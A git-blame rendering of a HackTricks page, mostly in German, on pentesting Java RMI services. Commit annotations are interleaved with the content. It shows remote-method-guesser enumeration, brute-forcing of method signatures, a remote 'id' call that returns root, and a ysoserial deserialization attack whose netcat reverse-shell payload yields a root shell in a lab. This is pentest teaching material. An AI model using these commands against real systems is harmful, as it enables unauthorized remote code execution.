Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-26 14:40:37 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/1099-pentesting-java-rmi.md

337 lines
20 KiB
Markdown
Raw Normal View History

GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
# 1098/1099/1050 - Pentesting Java RMI - RMI-IIOP
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
<details>
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2
2024-05-05 22:18:38 +00:00
<summary><strong>Lernen Sie AWS-Hacking von Null auf Held mit</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated to German
2024-02-10 15:36:32 +00:00
Andere Möglichkeiten, HackTricks zu unterstützen:
arte
2024-01-03 10:42:55 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat
2024-03-17 16:32:19 +00:00
* Wenn Sie Ihr **Unternehmen in HackTricks beworben sehen möchten** oder **HackTricks im PDF-Format herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)!
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2
2024-05-05 22:18:38 +00:00
* Holen Sie sich das [**offizielle PEASS & HackTricks-Merch**](https://peass.creator-spring.com)
Translated to German
2024-02-10 15:36:32 +00:00
* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family)
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat
2024-03-17 16:32:19 +00:00
* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2
2024-05-05 22:18:38 +00:00
* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden.
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
</details>
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2
2024-05-05 22:18:38 +00:00
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
update
2023-01-01 16:19:07 +00:00
\
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2
2024-05-05 22:18:38 +00:00
Verwenden Sie [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks), um einfach Workflows zu erstellen und zu **automatisieren**, die von den weltweit **fortschrittlichsten** Community-Tools unterstützt werden.\
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat
2024-03-17 16:32:19 +00:00
Heute Zugriff erhalten:
GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
update
2023-01-01 16:19:07 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated to German
2024-02-10 15:36:32 +00:00
## Grundlegende Informationen
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2
2024-05-05 22:18:38 +00:00
_Java Remote Method Invocation_ oder _Java RMI_ ist ein objektorientierter _RPC-Mechanismus_, der es einem Objekt in einer _Java Virtual Machine_ ermöglicht, Methoden auf einem Objekt in einer anderen _Java Virtual Machine_ aufzurufen. Dies ermöglicht es Entwicklern, verteilte Anwendungen unter Verwendung eines objektorientierten Paradigmas zu schreiben. Eine kurze Einführung in _Java RMI_ aus offensiver Perspektive finden Sie in [diesem Blackhat-Vortrag](https://youtu.be/t\_aw1mDNhzI?t=202).
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated to German
2024-02-10 15:36:32 +00:00
**Standardport:** 1090,1098,1099,1199,4443-4446,8999-9010,9999
GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
```
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
PORT STATE SERVICE VERSION
1090/tcp open ssl/java-rmi Java RMI
9010/tcp open java-rmi Java RMI
37471/tcp open java-rmi Java RMI
40259/tcp open ssl/java-rmi Java RMI
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat
2024-03-29 21:05:19 +00:00
In der Regel sind nur die Standard-_Java RMI_-Komponenten (das _RMI-Register_ und das _Aktivierungssystem_) an gängige Ports gebunden. Die _Remote-Objekte_, die die tatsächliche _RMI_-Anwendung implementieren, sind normalerweise an zufällige Ports gebunden, wie im obigen Output gezeigt.
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2
2024-05-05 22:18:38 +00:00
_nmap_ hat manchmal Schwierigkeiten, geschützte _SSL_-_RMI_-Dienste zu identifizieren. Wenn Sie auf einem gängigen _RMI_-Port einen unbekannten SSL-Dienst finden, sollten Sie weitere Untersuchungen durchführen.
GitBook: [master] one page modified
2021-06-10 16:42:00 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat
2024-03-29 21:05:19 +00:00
## RMI-Komponenten
GitBook: [master] one page modified
2021-06-10 16:42:00 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2
2024-05-05 22:18:38 +00:00
Um es einfach auszudrücken, ermöglicht _Java RMI_ einem Entwickler, ein _Java-Objekt_ im Netzwerk verfügbar zu machen. Dies öffnet einen _TCP_-Port, über den Clients eine Verbindung herstellen und Methoden des entsprechenden Objekts aufrufen können. Obwohl dies einfach klingt, gibt es mehrere Herausforderungen, die _Java RMI_ lösen muss:
GitBook: [master] one page modified
2021-06-10 16:42:00 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat
2024-03-29 21:05:19 +00:00
1. Um einen Methodenaufruf über _Java RMI_ zu verteilen, müssen Clients die IP-Adresse, den empfangenden Port, die implementierte Klasse oder das Interface und die `ObjID` des Zielobjekts kennen (die `ObjID` ist ein eindeutiger und zufälliger Bezeichner, der erstellt wird, wenn das Objekt im Netzwerk verfügbar gemacht wird. Sie ist erforderlich, da _Java RMI_ es ermöglicht, dass mehrere Objekte auf demselben _TCP_-Port lauschen).
2. Remote-Clients können Ressourcen auf dem Server zuweisen, indem sie Methoden auf das freigegebene Objekt aufrufen. Die _Java Virtual Machine_ muss verfolgen, welche dieser Ressourcen noch in Verwendung sind und welche davon vom Garbage Collector entfernt werden können.
GitBook: [master] one page modified
2021-06-10 16:42:00 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat
2024-03-29 21:05:19 +00:00
Die erste Herausforderung wird durch das _RMI-Register_ gelöst, das im Grunde ein Namensdienst für _Java RMI_ ist. Das _RMI-Register_ selbst ist auch ein _RMI-Dienst_, aber das implementierte Interface und die `ObjID` sind festgelegt und allen _RMI_-Clients bekannt. Dies ermöglicht es _RMI_-Clients, das _RMI-Register_ zu nutzen, indem sie lediglich den entsprechenden _TCP_-Port kennen.
GitBook: [master] one page modified
2021-06-10 16:42:00 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat
2024-03-29 21:05:19 +00:00
Wenn Entwickler ihre _Java-Objekte_ im Netzwerk verfügbar machen möchten, binden sie diese normalerweise an ein _RMI-Register_. Das _Register_ speichert alle Informationen, die zum Verbinden mit dem Objekt erforderlich sind (IP-Adresse, empfangender Port, implementierte Klasse oder Interface und den Wert der `ObjID`) und macht sie unter einem menschenlesbaren Namen (dem _gebundenen Namen_) verfügbar. Clients, die den _RMI-Dienst_ nutzen möchten, fragen das _RMI-Register_ nach dem entsprechenden _gebundenen Namen_, und das Register gibt alle erforderlichen Informationen zurück, um eine Verbindung herzustellen. Somit ist die Situation im Grunde genommen die gleiche wie bei einem gewöhnlichen _DNS_-Dienst. Das folgende Listing zeigt ein kleines Beispiel:
GitBook: [master] one page modified
2021-06-10 16:42:00 +00:00
```java
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
import java.rmi.registry.Registry;
Update RMI source code example
2021-12-30 08:57:22 +00:00
import java.rmi.registry.LocateRegistry;
import lab.example.rmi.interfaces.RemoteService;
GitBook: [master] one page modified
2021-06-10 16:42:00 +00:00
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
public class ExampleClient {
GitBook: [master] one page modified
2021-06-10 16:42:00 +00:00
Translated to German
2024-02-10 15:36:32 +00:00
private static final String remoteHost = "172.17.0.2";
private static final String boundName = "remote-service";
GitBook: [master] one page modified
2021-06-10 16:42:00 +00:00
Translated to German
2024-02-10 15:36:32 +00:00
public static void main(String[] args)
{
try {
Registry registry = LocateRegistry.getRegistry(remoteHost); // Connect to the RMI registry
RemoteService ref = (RemoteService)registry.lookup(boundName); // Lookup the desired bound name
String response = ref.remoteMethod(); // Call a remote method
GitBook: [master] 2 pages modified
2021-06-18 17:11:21 +00:00
Translated to German
2024-02-10 15:36:32 +00:00
} catch( Exception e) {
e.printStackTrace();
}
}
}
```
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat
2024-03-17 16:32:19 +00:00
Die zweite der oben genannten Herausforderungen wird durch den _Distributed Garbage Collector_ (_DGC_) gelöst. Dies ist ein weiterer _RMI-Dienst_ mit einem bekannten `ObjID`-Wert und ist auf praktisch jedem _RMI-Endpunkt_ verfügbar. Wenn ein _RMI-Client_ beginnt, einen _RMI-Dienst_ zu nutzen, sendet er dem _DGC_ eine Information, dass das entsprechende _Remote-Objekt_ verwendet wird. Der _DGC_ kann dann die Referenzzählung verfolgen und nicht verwendete Objekte bereinigen.
GitBook: [master] 2 pages modified
2021-06-18 17:11:21 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat
2024-03-17 16:32:19 +00:00
Zusammen mit dem veralteten _Aktivierungssystem_ sind dies die drei Standardkomponenten von _Java RMI_:
GitBook: [master] 2 pages modified
2021-06-18 17:11:21 +00:00
Translated to German
2024-02-10 15:36:32 +00:00
1. Das _RMI-Register_ (`ObjID = 0`)
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat
2024-03-17 16:32:19 +00:00
2. Das _Aktivierungssystem_ (`ObjID = 1`)
Translated to German
2024-02-10 15:36:32 +00:00
3. Der _Distributed Garbage Collector_ (`ObjID = 2`)
GitBook: [master] 2 pages modified
2021-06-18 17:11:21 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2
2024-05-05 22:18:38 +00:00
Die Standardkomponenten von _Java RMI_ sind seit geraumer Zeit bekannte Angriffsvektoren und es existieren mehrere Schwachstellen in veralteten _Java_-Versionen. Aus der Sicht eines Angreifers sind diese Standardkomponenten interessant, weil sie bekannte Klassen/Interfaces implementiert haben und es leicht möglich ist, mit ihnen zu interagieren. Diese Situation ist bei benutzerdefinierten _RMI-Diensten_ anders. Um eine Methode auf einem _Remote-Objekt_ aufzurufen, muss man im Voraus die entsprechende Methodensignatur kennen. Ohne Kenntnis einer vorhandenen Methodensignatur gibt es keine Möglichkeit, mit einem _RMI-Dienst_ zu kommunizieren.
GitBook: [master] 2 pages modified
2021-06-18 17:11:21 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat
2024-03-17 16:32:19 +00:00
## RMI-Auflistung
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated to German
2024-02-10 15:36:32 +00:00
[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) ist ein _Java RMI_-Schwachstellenscanner, der in der Lage ist, gängige _RMI-Schwachstellen_ automatisch zu identifizieren. Immer wenn Sie einen _RMI_-Endpunkt identifizieren, sollten Sie es ausprobieren:
GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
```
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
$ rmg enum 172.17.0.2 9010
[+] RMI registry bound names:
[+]
[+] - plain-server2
[+] --> de.qtc.rmg.server.interfaces.IPlainServer (unknown class)
[+] Endpoint: iinsecure.dev:37471 TLS: no ObjID: [55ff5a5d:17e0501b054:-7ff7, 3638117546492248534]
[+] - legacy-service
[+] --> de.qtc.rmg.server.legacy.LegacyServiceImpl_Stub (unknown class)
[+] Endpoint: iinsecure.dev:37471 TLS: no ObjID: [55ff5a5d:17e0501b054:-7ffc, 708796783031663206]
[+] - plain-server
[+] --> de.qtc.rmg.server.interfaces.IPlainServer (unknown class)
[+] Endpoint: iinsecure.dev:37471 TLS: no ObjID: [55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]
[+]
[+] RMI server codebase enumeration:
[+]
[+] - http://iinsecure.dev/well-hidden-development-folder/
[+] --> de.qtc.rmg.server.legacy.LegacyServiceImpl_Stub
[+] --> de.qtc.rmg.server.interfaces.IPlainServer
[+]
[+] RMI server String unmarshalling enumeration:
[+]
[+] - Caught ClassNotFoundException during lookup call.
[+] --> The type java.lang.String is unmarshalled via readObject().
[+] Configuration Status: Outdated
[+]
[+] RMI server useCodebaseOnly enumeration:
[+]
[+] - Caught MalformedURLException during lookup call.
[+] --> The server attempted to parse the provided codebase (useCodebaseOnly=false).
[+] Configuration Status: Non Default
[+]
[+] RMI registry localhost bypass enumeration (CVE-2019-2684):
[+]
[+] - Caught NotBoundException during unbind call (unbind was accepeted).
[+] Vulnerability Status: Vulnerable
[+]
[+] RMI Security Manager enumeration:
[+]
[+] - Security Manager rejected access to the class loader.
[+] --> The server does use a Security Manager.
[+] Configuration Status: Current Default
[+]
[+] RMI server JEP290 enumeration:
[+]
[+] - DGC rejected deserialization of java.util.HashMap (JEP290 is installed).
[+] Vulnerability Status: Non Vulnerable
[+]
[+] RMI registry JEP290 bypass enmeration:
[+]
[+] - Caught IllegalArgumentException after sending An Trinh gadget.
[+] Vulnerability Status: Vulnerable
[+]
[+] RMI ActivationSystem enumeration:
[+]
[+] - Caught IllegalArgumentException during activate call (activator is present).
[+] --> Deserialization allowed - Vulnerability Status: Vulnerable
[+] --> Client codebase enabled - Configuration Status: Non Default
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2
2024-05-05 22:18:38 +00:00
Die Ausgabe der Aufzählungsaktion wird in den [Dokumentationsseiten](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/actions.md#enum-action) des Projekts genauer erläutert. Abhängig vom Ergebnis sollten Sie versuchen, identifizierte Schwachstellen zu überprüfen.
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat
2024-03-17 16:32:19 +00:00
Die von _remote-method-guesser_ angezeigten `ObjID`-Werte können verwendet werden, um die Betriebszeit des Dienstes zu bestimmen. Dies kann helfen, andere Schwachstellen zu identifizieren:
GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
```
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
$ rmg objid '[55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]'
[+] Details for ObjID [55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]
[+]
[+] ObjNum: -4004948013687638236
[+] UID:
[+] Unique: 1442798173
[+] Time: 1640761503828 (Dec 29,2021 08:05)
[+] Count: -32760
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```
GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
## Bruteforcing Remote Methods
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2
2024-05-05 22:18:38 +00:00
Auch wenn bei der Enumeration keine Schwachstellen identifiziert wurden, könnten die verfügbaren _RMI_-Dienste dennoch gefährliche Funktionen offenlegen. Darüber hinaus sind bei der Kommunikation mit den Standardkomponenten von _RMI_ Deserialisierungsfilter vorhanden, aber bei der Kommunikation mit benutzerdefinierten _RMI_-Diensten sind solche Filter normalerweise nicht vorhanden. Das Wissen um gültige Methodensignaturen bei _RMI_-Diensten ist daher wertvoll.
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat
2024-03-29 21:05:19 +00:00
Leider unterstützt _Java RMI_ nicht das Auflisten von Methoden auf _Remote-Objekten_. Dennoch ist es möglich, Methodensignaturen mit Tools wie [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) oder [rmiscout](https://github.com/BishopFox/rmiscout) zu bruteforcen:
GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
```
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
$ rmg guess 172.17.0.2 9010
[+] Reading method candidates from internal wordlist rmg.txt
[+] 752 methods were successfully parsed.
[+] Reading method candidates from internal wordlist rmiscout.txt
[+] 2550 methods were successfully parsed.
[+]
[+] Starting Method Guessing on 3281 method signature(s).
[+]
[+] MethodGuesser is running:
[+] --------------------------------
[+] [ plain-server2 ] HIT! Method with signature String execute(String dummy) exists!
[+] [ plain-server2 ] HIT! Method with signature String system(String dummy, String[] dummy2) exists!
[+] [ legacy-service ] HIT! Method with signature void logMessage(int dummy1, String dummy2) exists!
[+] [ legacy-service ] HIT! Method with signature void releaseRecord(int recordID, String tableName, Integer remoteHashCode) exists!
[+] [ legacy-service ] HIT! Method with signature String login(java.util.HashMap dummy1) exists!
[+] [6562 / 6562] [#####################################] 100%
[+] done.
[+]
[+] Listing successfully guessed methods:
[+]
[+] - plain-server2 == plain-server
[+] --> String execute(String dummy)
[+] --> String system(String dummy, String[] dummy2)
[+] - legacy-service
[+] --> void logMessage(int dummy1, String dummy2)
[+] --> void releaseRecord(int recordID, String tableName, Integer remoteHashCode)
[+] --> String login(java.util.HashMap dummy1)
GitBook: [master] 2 pages modified
2021-06-18 17:11:21 +00:00
```
Translated to German
2024-02-10 15:36:32 +00:00
Identifizierte Methoden können wie folgt aufgerufen werden:
GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
```
Translated to German
2024-02-10 15:36:32 +00:00
$ rmg call 172.17.0.2 9010 '"id"' --bound-name plain-server --signature "String execute(String dummy)" --plugin GenericPrint.jar
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
[+] uid=0(root) gid=0(root) groups=0(root)
GitBook: [master] 2 pages modified
2021-06-18 17:11:21 +00:00
```
Translated to German
2024-02-10 15:36:32 +00:00
Oder Sie können Deserialisierungsangriffe wie folgt durchführen:
GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
```
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
$ rmg serial 172.17.0.2 9010 CommonsCollections6 'nc 172.17.0.1 4444 -e ash' --bound-name plain-server --signature "String execute(String dummy)"
[+] Creating ysoserial payload... done.
[+]
[+] Attempting deserialization attack on RMI endpoint...
[+]
[+] Using non primitive argument type java.lang.String on position 0
[+] Specified method signature is String execute(String dummy)
[+]
[+] Caught ClassNotFoundException during deserialization attack.
[+] Server attempted to deserialize canary class 6ac727def61a4800a09987c24352d7ea.
[+] Deserialization attack probably worked :)
$ nc -vlp 4444
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 172.17.0.2.
Ncat: Connection from 172.17.0.2:45479.
id
uid=0(root) gid=0(root) groups=0(root)
GitBook: [master] 2 pages modified
2021-06-18 17:11:21 +00:00
```
Translated to German
2024-02-10 15:36:32 +00:00
Weitere Informationen finden Sie in diesen Artikeln:
GitBook: [master] 2 pages modified
2021-06-18 17:11:21 +00:00
Translated to German
2024-02-10 15:36:32 +00:00
* [Angriff auf Java RMI-Dienste nach JEP 290](https://mogwailabs.de/de/blog/2019/03/attacking-java-rmi-services-after-jep-290/)
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2
2024-05-05 22:18:38 +00:00
* [Methodenraten](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/method-guessing.md)
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
* [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
* [rmiscout](https://bishopfox.com/blog/rmiscout)
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat
2024-03-29 21:05:19 +00:00
Neben dem Raten sollten Sie auch in Suchmaschinen oder auf _GitHub_ nach der Schnittstelle oder sogar der Implementierung eines gefundenen _RMI_-Dienstes suchen. Der _gebundene Name_ und der Name der implementierten Klasse oder Schnittstelle können hier hilfreich sein.
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
Translated to German
2024-02-10 15:36:32 +00:00
## Bekannte Schnittstellen
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat
2024-03-17 16:32:19 +00:00
[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) markiert Klassen oder Schnittstellen als `bekannt`, wenn sie in der internen Datenbank bekannter _RMI-Dienste_ des Tools aufgeführt sind. In diesen Fällen können Sie die `bekannt`-Aktion verwenden, um weitere Informationen zum entsprechenden _RMI-Dienst_ zu erhalten:
GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
```
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
$ rmg enum 172.17.0.2 1090 | head -n 5
[+] RMI registry bound names:
[+]
[+] - jmxrmi
[+] --> javax.management.remote.rmi.RMIServerImpl_Stub (known class: JMX Server)
[+] Endpoint: localhost:41695 TLS: no ObjID: [7e384a4f:17e0546f16f:-7ffe, -553451807350957585]
$ rmg known javax.management.remote.rmi.RMIServerImpl_Stub
[+] Name:
[+] JMX Server
[+]
[+] Class Name:
[+] - javax.management.remote.rmi.RMIServerImpl_Stub
[+] - javax.management.remote.rmi.RMIServer
[+]
[+] Description:
[+] Java Management Extensions (JMX) can be used to monitor and manage a running Java virtual machine.
[+] This remote object is the entrypoint for initiating a JMX connection. Clients call the newClient
[+] method usually passing a HashMap that contains connection options (e.g. credentials). The return
[+] value (RMIConnection object) is another remote object that is when used to perform JMX related
[+] actions. JMX uses the randomly assigned ObjID of the RMIConnection object as a session id.
[+]
[+] Remote Methods:
[+] - String getVersion()
[+] - javax.management.remote.rmi.RMIConnection newClient(Object params)
[+]
[+] References:
[+] - https://docs.oracle.com/javase/8/docs/technotes/guides/management/agent.html
[+] - https://github.com/openjdk/jdk/tree/master/src/java.management.rmi/share/classes/javax/management/remote/rmi
[+]
[+] Vulnerabilities:
[+]
[+] -----------------------------------
[+] Name:
[+] MLet
[+]
[+] Description:
[+] MLet is the name of an MBean that is usually available on JMX servers. It can be used to load
[+] other MBeans dynamically from user specified codebase locations (URLs). Access to the MLet MBean
[+] is therefore most of the time equivalent to remote code execution.
[+]
[+] References:
[+] - https://github.com/qtc-de/beanshooter
[+]
[+] -----------------------------------
[+] Name:
[+] Deserialization
[+]
[+] Description:
[+] Before CVE-2016-3427 got resolved, JMX accepted arbitrary objects during a call to the newClient
[+] method, resulting in insecure deserialization of untrusted objects. Despite being fixed, the
[+] actual JMX communication using the RMIConnection object is not filtered. Therefore, if you can
[+] establish a working JMX connection, you can also perform deserialization attacks.
[+]
[+] References:
[+] - https://github.com/qtc-de/beanshooter
GitBook: [master] 2 pages modified
2021-06-18 17:11:21 +00:00
```
GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
## Shodan
GitBook: [master] 2 pages modified
2021-06-18 17:11:21 +00:00
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
* `port:1099 java`
GitBook: [master] 2 pages modified
2021-06-18 17:11:21 +00:00
Translated to German
2024-02-10 15:36:32 +00:00
## Werkzeuge
GitBook: [master] 2 pages modified
2021-06-18 17:11:21 +00:00
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
* [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
* [rmiscout](https://github.com/BishopFox/rmiscout)
* [BaRMIe](https://github.com/NickstaDB/BaRMIe)
GitBook: [master] one page modified
2020-10-05 15:35:22 +00:00
Translated to German
2024-02-10 15:36:32 +00:00
## Referenzen
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat
2024-03-17 16:32:19 +00:00
a
2024-02-08 21:36:35 +00:00
* [https://github.com/qtc-de/remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
Translated to German
2024-02-10 15:36:32 +00:00
## HackTricks Automatische Befehle
GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
```
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
Protocol_Name: Java RMI #Protocol Abbreviation if there is one.
Port_Number: 1090,1098,1099,1199,4443-4446,8999-9010,9999 #Comma separated if there is more than one.
Protocol_Description: Java Remote Method Invocation #Protocol Abbreviation Spelled out
HAC 1099
2021-08-12 12:35:15 +00:00
1099 Yaml
2021-08-15 18:15:13 +00:00
Entry_1:
Translated to German
2024-02-10 15:36:32 +00:00
Name: Enumeration
Description: Perform basic enumeration of an RMI service
Command: rmg enum {IP} {PORT}
HAC 1099
2021-08-12 12:35:15 +00:00
```
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2
2024-05-05 22:18:38 +00:00
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat
2024-03-17 16:32:19 +00:00
\
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2
2024-05-05 22:18:38 +00:00
Verwenden Sie [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks), um mühelos **Workflows zu erstellen und zu automatisieren**, die von den fortschrittlichsten Community-Tools der Welt unterstützt werden.\
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat
2024-03-17 16:32:19 +00:00
Heute Zugriff erhalten:
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
update
2023-01-01 16:19:07 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
<details>
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat
2024-03-17 16:32:19 +00:00
